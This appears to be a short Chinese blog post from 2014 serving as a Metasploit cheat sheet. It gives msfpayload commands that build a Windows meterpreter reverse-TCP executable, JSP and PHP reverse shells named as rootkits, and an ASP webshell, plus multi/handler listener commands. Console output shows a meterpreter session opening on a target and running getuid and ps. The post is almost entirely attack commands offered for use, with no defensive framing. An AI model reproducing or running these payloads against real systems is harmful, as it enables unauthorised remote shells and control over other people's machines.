BT5 msf msfpayload生成2进制 msf生成exe meterpreter监听

BT5 msf msfpayload生成2进制 msf生成exe
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.85.147 LPORT=4444 X >/root/Desktop/mt.exe


其它脚本
msfpayload java/jsp_shell_reverse_tcp LHOST=58.60.195.226  LPORT=1234 R > balckrootkit.jsp

msfcli multi/handler PAYLOAD=java/jsp_shell_reverse_tcp LHOST=58.60.195.226 LPORT=1234 E

msfpayload php/reverse_php  LHOST=58.60.195.226 LPORT=1234 R > balckrootkit.php

msfcli multi/handler PAYLOAD=php/reverse_php  LHOST=58.60.195.226 LPORT=1234 E

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.167| msfencode -t asp -o webshell.asp

msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.0.167 LPORT=443 E

监听

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.85.147
LHOST => 192.168.85.147
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.85.147:4444
[*] Starting the payload handler...             //接着在目标机运行 mt.exe
[*] Sending stage (769536 bytes) to 192.168.85.160
[*] Meterpreter session 1 opened (192.168.85.147:4444 -> 192.168.85.160:1262) at 2014-08-26 10:45:11 +0800

meterpreter >


meterpreter > getuid    查看权限
Server username: K8ANTI-B2B9B81C\Administrator
meterpreter > ps   查看进程

posted on 2014-10-15 13:50  =_=!  阅读(409)  评论(0编辑  收藏  举报

导航